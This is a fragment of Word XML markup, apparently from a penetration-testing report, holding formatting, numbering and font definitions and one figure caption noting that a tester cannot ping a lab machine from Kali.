          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ACBAE89" wp14:editId="55F9425E">
            <wp:extent cx="4795556" cy="782810"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="160370660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810495" cy="785249"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="317" w:name="resource95"/>
    <w:p w14:paraId="12160800" w14:textId="7D63B58D" w:rsidR="00590555" w:rsidRPr="00D77DFE" w:rsidRDefault="00590555" w:rsidP="00590555">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>HYPERLINK  \l "paragraph95"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Figure A.76</w:t>
      </w:r>
      <w:bookmarkEnd w:id="317"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: The tester cannot ping the founded machine (10.0.4.141) from Kali</w:t>
      </w:r>
      <w:r w:rsidR="00150163">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D87D2C" w14:textId="77777777" w:rsidR="00F257D9" w:rsidRPr="00D77DFE" w:rsidRDefault="00F257D9" w:rsidP="00F257D9">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22AD6327" w14:textId="77777777" w:rsidR="00F257D9" w:rsidRPr="00D77DFE" w:rsidRDefault="00F257D9" w:rsidP="005D4C66">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F257D9" w:rsidRPr="00D77DFE" w:rsidSect="00324A56">
      <w:footerReference w:type="default" r:id="rId136"/>
      <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
      <w:pgMar w:top="1418" w:right="1418"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AA9C7" w14:textId="77777777" w:rsidR="00B97566" w:rsidRDefault="00B97566" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0208E438" w14:textId="77777777" w:rsidR="00B97566" w:rsidRDefault="00B97566" w:rsidP="00C42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Futura Bk">
    <w:altName w:val="Century Gothic"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="80000AE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996322"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="40A1B1B9" w14:textId="2F8187D6" w:rsidR="00C420B0" w:rsidRDefault="00C420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0E9E3A" w14:textId="77777777" w:rsidR="00C420B0" w:rsidRDefault="00C420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7B192" w14:textId="77777777" w:rsidR="00B97566" w:rsidRDefault="00B97566" w:rsidP="00C420B0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="263AE6AA" w14:textId="77777777" w:rsidR="00B97566" w:rsidRDefault="00B97566" w:rsidP="00C420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88A3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057FEE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="23E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82025"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A4B410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83FAF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="52F4A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B74F5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5BAAF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C15A62"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49A8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9775E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="51EE8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7078B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B8C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D117D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="442485E8"/>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05AFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7361B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8B637B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="95BA9622"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Franklin Gothic Book" w:hAnsi="Franklin Gothic Book" w:cs="Franklin Gothic Book" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="-2"/>
        <w:w w:val="100"/>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76AF0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E8AA88F2"/>
    <w:lvl w:ilvl="0" w:tplc="2800000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>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12" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="22B07D71"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="766C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FD09D0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3452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9862E2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD146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71A39"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27C873D8"/>
    <w:styleLink w:val="CurrentList1"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2340"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280" w:hanging="1440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2C3A7179"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1024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1B0C19"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7DCA3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A94AD0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9EE0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B5173C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="22C67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8360FA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3DC2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871BF8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7FC0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533BEC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="03CE315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23" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="488A1DAF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="329CF76A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
        <w:i w:val="0"/>
        <w:iCs w:val="0"/>
        <w:spacing w:val="-2"/>
        <w:w w:val="100"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>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Aptos" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Aptos" w:cstheme="minorBidi" w:hint="default"/>
        <w:color w:val="auto"/>
        <w:sz w:val="24"/>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1D7114"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9514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180D3A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="25C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BF2B3D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ED5C7448"/>
    <w:lvl w:ilvl="0" w:tplc="68A60582">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        <w:b w:val="0"/>
        <w:bCs/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="28000019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="2800001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2800000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="28000019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="2800001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2800000F" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="28000019" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2800001B" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="50423FC7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F00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52484"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D3A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7C47F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EDF4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A5B2D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0A1AD152"/>
    <w:lvl w:ilvl="0" w:tplc="28000001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="28000003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="28000005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="28000001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="28000003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="28000005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="28000001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="28000003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="28000005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7200" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="31" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5DB659EA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7FC0543C"/>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32" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5E5D7124"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9BFA5AA6"/>
    <w:lvl w:ilvl="0" w:tplc="28000001">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="28000003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="28000005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="28000001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="28000003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="28000005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="28000001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="28000003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="28000005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="33" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="616E0370"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24AC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F4672"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="815E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CF3039"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5664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252BED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA16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BC67F0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4AFA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02A3E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7188F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3D87C5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0876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093309"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ACD29B3A"/>
    <w:lvl w:ilvl="0" w:tplc="04090001">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="CambriaH1"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="450" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:color w:val="1F497D"/>
        <w:sz w:val="32"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="04090003">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="CambriaH2"/>
      <w:lvlText w:val="%2.1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="450" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
        <w:b w:val="0"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="04090005">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1890" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2610" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3330" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4050" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4770" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5490" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6210" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="41" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7AE60C85"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B309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961E6E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="40B6F0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608503">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2110657339">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1429231582">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1757945727">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="392117289">
    <w:abstractNumId w:val="23"/>
  </w:num>
